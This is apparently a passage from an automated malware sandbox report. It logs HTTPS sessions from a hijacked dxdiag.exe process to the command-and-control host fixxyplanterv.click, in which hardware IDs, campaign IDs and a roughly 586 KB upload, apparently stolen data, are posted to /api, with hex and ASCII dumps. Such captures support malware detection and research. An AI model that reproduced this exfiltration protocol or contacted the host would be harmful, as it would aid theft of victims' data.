                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 9013b49bbc517277-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1845&min_rtt=1834&rtt_var=696&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2847&recv_bytes=15974&delivery_rate=1592148&cwnd=225&unsent_bytes=0&cid=b5256d73e1b28741&ts=561&x=0"
                                                                                                              2025-01-13 07:34:44 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                              2025-01-13 07:34:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              4192.168.2.849711104.21.6.1164431984C:\Windows\SysWOW64\dxdiag.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-13 07:34:44 UTC281OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: multipart/form-data; boundary=AY3AN2ECC6589A
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 20216
                                                                                                              Host: fixxyplanterv.click
                                                                                                              2025-01-13 07:34:44 UTC15331OUTData Raw: 2d 2d 41 59 33 41 4e 32 45 43 43 36 35 38 39 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 44 30 38 39 41 41 35 35 31 45 43 43 45 44 34 35 45 43 36 34 36 38 43 35 43 39 36 33 32 34 39 0d 0a 2d 2d 41 59 33 41 4e 32 45 43 43 36 35 38 39 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 41 59 33 41 4e 32 45 43 43 36 35 38 39 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 5a 71 63 68 4f 61 2d 2d 6e 65 77 0d 0a 2d 2d 41 59 33 41 4e 32 45 43 43 36
                                                                                                              Data Ascii: --AY3AN2ECC6589AContent-Disposition: form-data; name="hwid"FD089AA551ECCED45EC6468C5C963249--AY3AN2ECC6589AContent-Disposition: form-data; name="pid"3--AY3AN2ECC6589AContent-Disposition: form-data; name="lid"ZqchOa--new--AY3AN2ECC6
                                                                                                              2025-01-13 07:34:44 UTC4885OUTData Raw: 00 e8 73 23 d1 61 a9 ef 87 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 3e 37 1c 1d 96 fa 7e 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 c3 c1 e7 62 c9 e0 95 58 f0 4a f0 ab c1 ff 36 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc e4 dd 93 3c 16 af 54 8b b3 c5 72 6e a6 5a 98 2a 94 a7 ae e5 a6 2a 8d 72 3d 31 9a 3c bc 29 a5 d6 98 ff 70 58 68 ff bb af ff fe e4 44 a2 4b 2d b9 ca 4c ae 76 b9 91 af 16 6a c9 bb 46 a2 8c 4b 7d 38 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 61 38 3a 2c f5 fd 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                              Data Ascii: s#a>7~sbXJ6<TrnZ**r=1<)pXhDK-LvjFK}8a8:,0
                                                                                                              2025-01-13 07:34:45 UTC1129INHTTP/1.1 200 OK
                                                                                                              Date: Mon, 13 Jan 2025 07:34:45 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=63cbm13qp5shpkcrtnt04ol2nj; expires=Fri, 09 May 2025 01:21:24 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vii8cjtp0UKniP4pvdUdfk3Lykm7XzyYNcujdmXTu4uODEJi9O7KHa7BxU%2B8O%2FKrntX2lfhbLqfRKxtIe9A6Gsy34xQMEPb9jND5taJ1jMxHwYgCGdyV9l3lkM3kwe%2FM3qT8JzsI"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 9013b4a33b54433f-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1668&min_rtt=1667&rtt_var=629&sent=11&recv=24&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21177&delivery_rate=1736028&cwnd=222&unsent_bytes=0&cid=6ee4fa098517992d&ts=914&x=0"
                                                                                                              2025-01-13 07:34:45 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                              2025-01-13 07:34:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              5192.168.2.849712104.21.6.1164431984C:\Windows\SysWOW64\dxdiag.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-13 07:34:47 UTC278OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: multipart/form-data; boundary=XFO1FXWQ01JO
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 1221
                                                                                                              Host: fixxyplanterv.click
                                                                                                              2025-01-13 07:34:47 UTC1221OUTData Raw: 2d 2d 58 46 4f 31 46 58 57 51 30 31 4a 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 44 30 38 39 41 41 35 35 31 45 43 43 45 44 34 35 45 43 36 34 36 38 43 35 43 39 36 33 32 34 39 0d 0a 2d 2d 58 46 4f 31 46 58 57 51 30 31 4a 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 58 46 4f 31 46 58 57 51 30 31 4a 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 5a 71 63 68 4f 61 2d 2d 6e 65 77 0d 0a 2d 2d 58 46 4f 31 46 58 57 51 30 31 4a 4f 0d 0a 43 6f
                                                                                                              Data Ascii: --XFO1FXWQ01JOContent-Disposition: form-data; name="hwid"FD089AA551ECCED45EC6468C5C963249--XFO1FXWQ01JOContent-Disposition: form-data; name="pid"1--XFO1FXWQ01JOContent-Disposition: form-data; name="lid"ZqchOa--new--XFO1FXWQ01JOCo
                                                                                                              2025-01-13 07:34:47 UTC1136INHTTP/1.1 200 OK
                                                                                                              Date: Mon, 13 Jan 2025 07:34:47 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=rre3jv0o7hua5n2t9im622em1r; expires=Fri, 09 May 2025 01:21:26 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HquP4F0Y0oce6e58sbkGmewkhxbsO5T%2Fyj37%2FiHvLAxboeBErVqAzWWx0bNNAZ%2Ff9TY0wG0vdPToxL67zkWo5GJYfK4eL%2Fdn7XoNprS%2Fl%2FtL9%2FmqvbXa%2BBLEQgJN4LxEe4nomkGj"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 9013b4b2cd300ca8-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1540&min_rtt=1496&rtt_var=593&sent=5&recv=9&lost=0&retrans=0&sent_bytes=2848&recv_bytes=2135&delivery_rate=1951871&cwnd=159&unsent_bytes=0&cid=7168fdce4a9e3a01&ts=443&x=0"
                                                                                                              2025-01-13 07:34:47 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                              2025-01-13 07:34:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              6192.168.2.849715104.21.6.1164431984C:\Windows\SysWOW64\dxdiag.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-13 07:34:48 UTC277OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: multipart/form-data; boundary=SWU054U4I
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 586097
                                                                                                              Host: fixxyplanterv.click
                                                                                                              2025-01-13 07:34:48 UTC15331OUTData Raw: 2d 2d 53 57 55 30 35 34 55 34 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 44 30 38 39 41 41 35 35 31 45 43 43 45 44 34 35 45 43 36 34 36 38 43 35 43 39 36 33 32 34 39 0d 0a 2d 2d 53 57 55 30 35 34 55 34 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 53 57 55 30 35 34 55 34 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 5a 71 63 68 4f 61 2d 2d 6e 65 77 0d 0a 2d 2d 53 57 55 30 35 34 55 34 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73
                                                                                                              Data Ascii: --SWU054U4IContent-Disposition: form-data; name="hwid"FD089AA551ECCED45EC6468C5C963249--SWU054U4IContent-Disposition: form-data; name="pid"1--SWU054U4IContent-Disposition: form-data; name="lid"ZqchOa--new--SWU054U4IContent-Dispos
                                                                                                              2025-01-13 07:34:48 UTC15331OUTData Raw: f0 c9 1e 2a 7c ef 31 61 fa cb f7 eb df 1a 18 a0 3c 5b d3 65 75 db 49 84 4d 1e d0 13 9d fd 39 d4 62 87 c0 b3 eb b2 cd e6 c6 b2 66 44 20 ba 0c 2c 2e b3 da 5f 68 b0 15 c1 c6 22 8a 25 fb 2f e8 80 91 5e 73 83 35 67 59 87 4c 7d 0f 14 eb 6b bb cc 25 c0 30 d9 07 36 06 7e 31 46 4f a2 f8 69 be fe 88 8b 9a a9 44 49 e8 fb 8e b9 09 8f d6 44 cd bd fa df ca cc 93 44 60 ca 13 42 e6 37 4b 06 f3 e3 b6 28 c8 eb 03 ea 50 ab f2 8c a6 05 82 a2 f8 eb 9a 47 95 58 8e 8b a3 4d 5e 84 5e 26 6b 1b 56 58 12 a8 44 84 7d 02 19 be 6b 7d 25 d7 00 63 a0 3a 41 f2 30 ac ad f1 2d 4a 9e 55 8b 22 1c 5e 70 94 47 5f 7c e7 d8 2a db 9b 33 83 9e a5 c5 41 e3 1f c8 0c ee af 05 c6 7e 66 db f7 04 c3 51 42 a7 5b 31 f4 55 38 c7 d3 5e 10 f8 8e a5 3b b8 9d 54 3f 79 82 cd ff da c7 0c 3e da ed 49 9d 59 61 89
                                                                                                              Data Ascii: *|1a<[euIM9bfD ,._h"%/^s5gYL}k%06~1FOiDIDD`B7K(PGXM^^&kVXD}k}%c:A0-JU"^pG_|*3A~fQB[1U8^;T?y>IYa
                                                                                                              2025-01-13 07:34:48 UTC15331OUTData Raw: 62 36 ab 3e 41 83 5e 67 58 c1 ef dc b4 62 60 ae a9 27 5c 25 db 7e 3b 3b f6 e3 eb 21 d1 59 37 0c d0 d1 eb 18 12 4c 1f 0d 53 04 e4 f1 0d 68 0a e2 43 1b 23 4f e7 13 e2 a9 be b8 ef 8a 99 e4 4b 21 5d 10 62 96 10 3c 00 64 ba 3f 6c 66 7f d8 1e 19 4e 04 e5 79 c0 c2 b9 5a 83 26 ed bd dc d7 9c 1f 15 44 94 78 e3 dc d1 26 54 7c d3 b0 74 ab f1 2f 7d 99 f1 ab e7 b5 91 59 aa 58 fd 3a f7 fc 4e 35 f4 7f 34 fb be 7b 35 6f 09 05 48 22 b7 c8 df 88 16 bc 61 d1 2e 11 42 52 3c e4 70 4a 26 47 13 78 d4 46 23 02 5c bb bf f5 35 e7 23 85 42 49 1d 7a b7 8b ac e1 ea 2a 78 e2 b2 c6 08 80 6a 98 2e b3 8d 96 66 2e ce 95 44 bc c7 c9 5b 36 03 3d 52 b7 ad ad 73 e6 de 62 77 60 e9 49 92 b0 85 1c 5a a4 27 14 69 b3 91 4c 68 e6 ea 77 7d da a3 70 12 71 4c a4 36 77 e6 98 11 19 69 31 94 e9 f5 a2 3c
                                                                                                              Data Ascii: b6>A^gXb`'\%~;;!Y7LShC#OK!]b<d?lfNyZ&Dx&T|t/}YX:N54{5oH"a.BR<pJ&GxF#\5#BIz*xj.f.D[6=Rsbw`IZ'iLhw}pqL6wi1<
                                                                                                              2025-01-13 07:34:48 UTC15331OUTData Raw: af 35 5e 92 ff 79 39 2f 93 c4 b7 05 b7 57 96 0c 1b 83 f7 8a 32 17 87 2e fa ce 3f 81 78 7f 52 4d b0 93 f4 d2 a0 d6 08 38 7e 16 03 70 b2 a1 8c fc 53 59 4a b8 63 23 d5 6e 8d 4c 11 01 c6 b8 30 dd b6 f9 5f d3 13 f9 f5 c8 94 b7 ef 0c 7a b8 22 e3 1a 6c bc 13 75 79 96 f6 fd 7f b7 18 09 80 12 81 3f b7 0b 68 81 1e 61 76 bc 29 5d c3 10 cc fa 9f 21 66 03 4d d4 8e c5 6e e0 25 c6 f5 de 0f 73 42 01 f7 9b bf 2c 7e b8 0a 70 ae df 2d ca cf 31 87 98 f4 b0 c4 09 d0 16 51 7d 15 d0 5a 76 ec 4b a9 e1 26 2a d1 11 e2 82 d3 5a 73 06 e0 10 30 55 46 ed 5c 26 d8 ca 45 20 0f 15 3d 96 8a 08 78 8d 7b f4 02 0b a3 2b ab b6 e0 14 c6 91 25 30 d0 f9 db 12 e4 64 8a 58 06 f0 fd fd 1d 64 e6 4f cd f2 42 0f 6f 31 c9 84 1a db 79 14 2f 37 3d 0c 08 30 bc 4b b7 6c 44 fc ad 14 cb 66 09 15 f8 70 08 c1
                                                                                                              Data Ascii: 5^y9/W2.?xRM8~pSYJc#nL0_z"luy?hav)]!fMn%sB,~p-1Q}ZvK&*Zs0UF\&E =x{+%0dXdOBo1y/7=0KlDfp
                                                                                                              2025-01-13 07:34:48 UTC15331OUTData Raw: b0 73 47 c4 4f d9 5a 39 58 29 eb 6d 3e b6 f9 c7 89 dc 07 72 93 34 0a 96 ec fb 23 f8 d0 52 2a 07 34 cf a1 33 d5 b6 33 67 78 02 73 fa 14 c1 75 fd 91 96 21 36 49 b8 4d 58 94 18 07 6c 46 ab 4b 10 c7 1d 29 90 a8 14 eb 3c 4f ac e8 71 70 ad 10 82 6d a7 6c 45 6b 7a 46 4e 32 80 49 ad 7d 36 a0 4e 71 ac 89 cc bf 15 86 f7 37 f3 f4 86 ba c9 fd c5 44 3f ce 39 7f 4c df 38 31 61 68 5a d5 a4 42 fe d6 70 f4 40 50 56 e3 2f db 20 8c a2 7c 4d 16 72 af 3f 2c e6 52 64 71 42 e9 d3 f2 35 cc 66 47 2f 29 35 d4 5c d4 35 00 d5 57 4a e3 5e 90 5e 2a 16 36 82 19 22 29 3a 57 3d 05 8e 63 76 8a 10 51 c2 66 de 92 ad 9e 7c 5d a1 87 57 0b d7 26 1c bb b3 12 76 79 a6 d9 93 36 44 39 bd 1e 1a e1 8a fd 91 8a e5 c8 0f 24 99 68 34 a0 59 03 87 67 85 9f 6c 9b 4c 80 2a 67 e7 12 32 2e 3d e2 f8 d3 a8 b1
                                                                                                              Data Ascii: sGOZ9X)m>r4#R*433gxsu!6IMXlFK)<OqpmlEkzFN2I}6Nq7D?9L81ahZBp@PV/ |Mr?,RdqB5fG/)5\5WJ^^*6"):W=cvQf|]W&vy6D9$h4YglL*g2.=
                                                                                                              2025-01-13 07:34:48 UTC15331OUTData Raw: ea e5 b0 ba fa cf a9 d7 e8 a0 e1 a7 7b 17 43 09 fb 06 8a 9c cc 0b 17 92 bf 64 b0 4f 49 9b f3 ce bf 92 56 2c 59 2a 9d a4 ff 39 88 61 4d 70 35 f5 96 e7 2c 6e 82 d7 d3 d5 13 c3 7a 07 00 9d c3 1b 3a 45 57 24 d2 d3 b9 2b 0b fe 46 22 8b a5 79 1b c3 2a 02 4b 9f bd b7 66 59 95 77 e4 13 f6 88 81 26 a9 08 35 5f 6a 08 d8 22 92 49 34 12 4c 96 64 cc 78 8b cb d8 be b8 71 ad 66 d7 81 ea 3b a7 8e e1 d5 53 f4 6d 00 7d e4 a6 e2 b4 18 08 e5 32 87 5b 3a dd bf 70 f3 df 5e 82 bf 96 06 31 7b 6e 27 a1 69 77 c9 db fd fe f6 e0 f3 09 d8 1d db 67 8d 71 6e 92 52 a8 f5 23 d5 55 4a 80 e6 77 ca 14 81 c4 52 18 a9 af d8 15 7a ea bc bf 00 08 e2 43 31 21 50 71 17 50 be 10 3d 27 b3 bf 4d 4b 01 a9 af 60 66 1f eb 47 04 fc 31 a6 00 c3 07 65 ef 92 43 58 44 b8 91 c8 e4 f5 21 87 bd cb af 78 85 af
                                                                                                              Data Ascii: {CdOIV,Y*9aMp5,nz:EW$+F"y*KfYw&5_j"I4Ldxqf;Sm}2[:p^1{n'iwgqnR#UJwRzC1!PqP='MK`fG1eCXD!x
                                                                                                              2025-01-13 07:34:48 UTC15331OUTData Raw: 23 de 60 94 f2 dd 54 c4 50 c2 70 83 16 d1 86 ae e2 f8 ae 66 3b 70 f6 6f 7d a3 72 2c 9c 50 2c 33 5e e0 97 79 c5 06 80 21 e5 6f 84 69 4e d9 91 a1 57 6d 62 9e 9f c0 62 af 73 aa e1 1d 88 c8 91 bd 20 13 a3 0a 13 ba 00 0a 82 f8 80 fe 03 60 63 39 ff e4 76 0e 44 99 34 a4 7d b9 03 0d 45 a2 61 dd fd b1 c0 94 54 ba 72 96 17 30 1a e8 f1 72 47 c0 46 f2 4c c6 f4 23 f6 d7 bb 9e 9a d8 48 1f dc 7e 3c 06 a3 60 df 93 10 94 c2 4d e9 af 95 2d 47 7f f5 68 22 bf 3f c1 6a f9 59 11 74 fe 0f 9a 76 71 8c 86 a4 d0 e4 c7 47 40 8f 06 51 e7 22 c8 17 c4 20 66 dd 06 06 e6 df be 80 ad 0f 85 21 ff 9a 93 ae b1 eb 36 2a ec 1d e6 0d 52 7e 34 83 0e 9c 67 2d b6 47 17 08 ea 82 7d ea d0 39 fc 09 73 c2 0d 3b 58 8e 5b a4 05 a2 51 bb 08 37 40 be db b8 83 0b 4f 9a 2f 8f d8 7a d4 40 04 7c 4f 8f 61 71
                                                                                                              Data Ascii: #`TPpf;po}r,P,3^y!oiNWmbbs `c9vD4}EaTr0rGFL#H~<`M-Gh"?jYtvqG@Q" f!6*R~4g-G}9s;X[Q7@O/z@|Oaq
                                                                                                              2025-01-13 07:34:48 UTC15331OUTData Raw: e7 f4 d6 9a 2a 3f 90 c0 80 b6 a7 8a 8b ea bc 95 a0 5b 15 f5 8f 41 e9 75 b0 b5 a8 20 7f 4f fb 64 9e 49 95 04 a6 f0 9c 63 38 49 55 0f 03 6d 11 51 fa 7a 68 59 a1 dd 59 b1 77 aa 2c 3b 0e ca 5c 0d 92 9a 9e 3a 6d 5c 43 42 b0 94 cb 41 45 58 0d 9d 2e 9f 40 4e 00 09 c2 64 5a f9 6c 6b d0 a9 9f 55 07 77 28 d0 15 e7 c5 51 b7 cf c5 a0 48 fc 5a a8 4b 12 35 13 56 de 68 eb 64 40 74 24 20 b8 9b a1 a3 81 ef 8e 84 8b c9 6f 52 9e b3 33 77 29 4f 0b 62 58 e8 45 ab c6 4c 4d e4 07 4d 48 f1 1c 7d 84 5b c1 2d e3 36 67 95 2a a2 5d a3 ee 7f ab 08 da 81 79 23 d0 d6 f0 b8 76 96 04 1b a9 73 89 b8 eb 6e 32 77 8c c2 f5 cd 42 a1 55 62 ce 27 4c 64 4d 8a 23 ef ac e7 05 9c 2d 82 2b 87 f4 29 7d 11 81 54 1d 1d 7e af 9f de 71 22 99 80 38 6c 6a 2b ad 52 86 9a 91 e8 f0 3a 4b 1c 0c 79 04 98 af e3
                                                                                                              Data Ascii: *?[Au OdIc8IUmQzhYYw,;\:m\CBAEX.@NdZlkUw(QHZK5Vhd@t$ oR3w)ObXELMMH}[-6g*]y#vsn2wBUb'LdM#-+)}T~q"8lj+R:Ky
                                                                                                              2025-01-13 07:34:48 UTC15331OUTData Raw: c1 4a 11 d9 0f 16 df 31 6c b3 7e 75 d6 18 84 55 65 8d 39 f0 4b 7d 68 6a fb 02 90 94 20 83 d2 06 e4 52 c5 e6 05 23 31 c9 82 4d b5 f1 56 39 67 bb b2 3d ad 77 3c c7 e9 cb 50 c6 cf 53 87 aa 6d c6 fe c2 f8 71 e3 eb 1a ef f8 4c b0 de 62 ae c6 de 99 5f 59 a0 51 d0 f3 f7 d9 4f 7b 5f de ac 44 2f 38 f4 6d be ee d7 73 3d f8 dc e0 f6 bf 77 2e c9 a5 0d 1e e2 ee 21 6e fd 5b a4 0a fd 31 81 37 45 98 fa 20 59 97 40 b6 3c 87 7c 11 e4 69 3b bc 64 f9 1c 61 5d 11 74 d3 7e 89 a8 c7 47 b9 b1 12 b1 92 e0 a2 be 13 cd 4e 9c f9 7a a4 b5 94 73 9e e5 2d 3c 38 75 da 40 82 ac d2 97 dc 29 59 95 a2 f9 d4 55 a5 9a 21 e1 cb 0c 53 f9 1a 18 9c 3d 1f 80 c3 76 36 8c d1 e6 04 04 a8 6a 45 78 99 34 e7 50 87 91 c5 c2 bf 7e 5d 97 fc ef 10 bd e2 c3 64 62 ac 59 0a 63 d0 da 80 69 0c 18 0b 86 0c 9f e7
                                                                                                              Data Ascii: J1l~uUe9K}hj R#1MV9g=w<PSmqLb_YQO{_D/8ms=w.!n[17E Y@<|i;da]t~GNzs-<8u@)YU!S=v6jEx4P~]dbYci
                                                                                                              2025-01-13 07:34:48 UTC15331OUTData Raw: 47 7c 20 b9 fd 02 27 87 b3 f5 49 e3 9f 8e 23 c9 76 5f fe cd fe 94 76 f5 79 33 4a d6 f7 7e e3 d1 f3 fc 6b 36 9f 3c fa de 2a d8 b9 2c bc 70 b3 9c 3a d7 fd 4a b3 e7 d6 a4 4d b8 0e ba 2e eb 15 21 cc 30 d0 35 c3 74 b7 62 61 89 4c e0 05 df fc 7c e5 59 1d 47 53 86 87 61 c3 7f 49 ee af 34 8a 73 8e 4a 3d 84 e7 b3 3a 5e ab 8a 94 6c cc a0 78 5a f6 5f c7 4b 7c a8 99 c3 91 92 36 95 3a 00 df b9 a3 a2 23 ff 59 45 28 22 1e bd a4 51 9e 3f fe a4 08 47 e3 90 fd 94 06 b3 45 01 50 22 dd 63 97 1c 56 5c ba b1 a6 64 fb e5 80 4b 92 3e d6 c2 ad 1d ad f4 0f 7e 56 8b 5d 97 f8 d0 16 93 02 5b b2 e6 ec d5 03 23 1d 8c 2f fd be 7a 73 4f 4e fd aa 5a 59 4c 6a 5f 0c 12 5e 60 2e 64 ee 31 cf 93 50 ac b4 14 a1 55 58 89 f3 ce ea 8e cc 7d 7d 23 ed 5c 68 b5 d5 2c 59 be 9c dc e9 63 a6 f3 ab c5 6f
                                                                                                              Data Ascii: G| 'I#v_vy3J~k6<*,p:JM.!05tbaL|YGSaI4sJ=:^lxZ_K|6:#YE("Q?GEP"cV\dK>~V][#/zsONZYLj_^`.d1PUX}}#\h,Yco
                                                                                                              2025-01-13 07:34:50 UTC1141INHTTP/1.1 200 OK
                                                                                                              Date: Mon, 13 Jan 2025 07:34:50 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=3ajl4pl4nlom0s1bo48ncun5ej; expires=Fri, 09 May 2025 01:21:29 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VUrCq4%2FWtPHo3OIpre7%2BTb2tTpzW6GCcsAgdO%2Basx7poQnqjv%2Bfp5nG6x9%2FEQ%2BDUxjDjnOSxXVdcPr0rAYitnCmntv7jAuraVXiKJqzaqc%2FU4CjAjoaFzdlggo111Y6DB2X0lZMH"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 9013b4bb7e78430d-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2465&min_rtt=2461&rtt_var=931&sent=206&recv=604&lost=0&retrans=0&sent_bytes=2848&recv_bytes=588682&delivery_rate=1169871&cwnd=230&unsent_bytes=0&cid=5f5d69f9dc390cd1&ts=1579&x=0"


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              7192.168.2.849719104.21.6.1164431984C:\Windows\SysWOW64\dxdiag.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-13 07:34:50 UTC267OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 80
                                                                                                              Host: fixxyplanterv.click
                                                                                                              2025-01-13 07:34:50 UTC80OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 5a 71 63 68 4f 61 2d 2d 6e 65 77 26 6a 3d 26 68 77 69 64 3d 46 44 30 38 39 41 41 35 35 31 45 43 43 45 44 34 35 45 43 36 34 36 38 43 35 43 39 36 33 32 34 39
                                                                                                              Data Ascii: act=get_message&ver=4.0&lid=ZqchOa--new&j=&hwid=FD089AA551ECCED45EC6468C5C963249
                                                                                                              2025-01-13 07:34:51 UTC1119INHTTP/1.1 200 OK
                                                                                                              Date: Mon, 13 Jan 2025 07:34:51 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
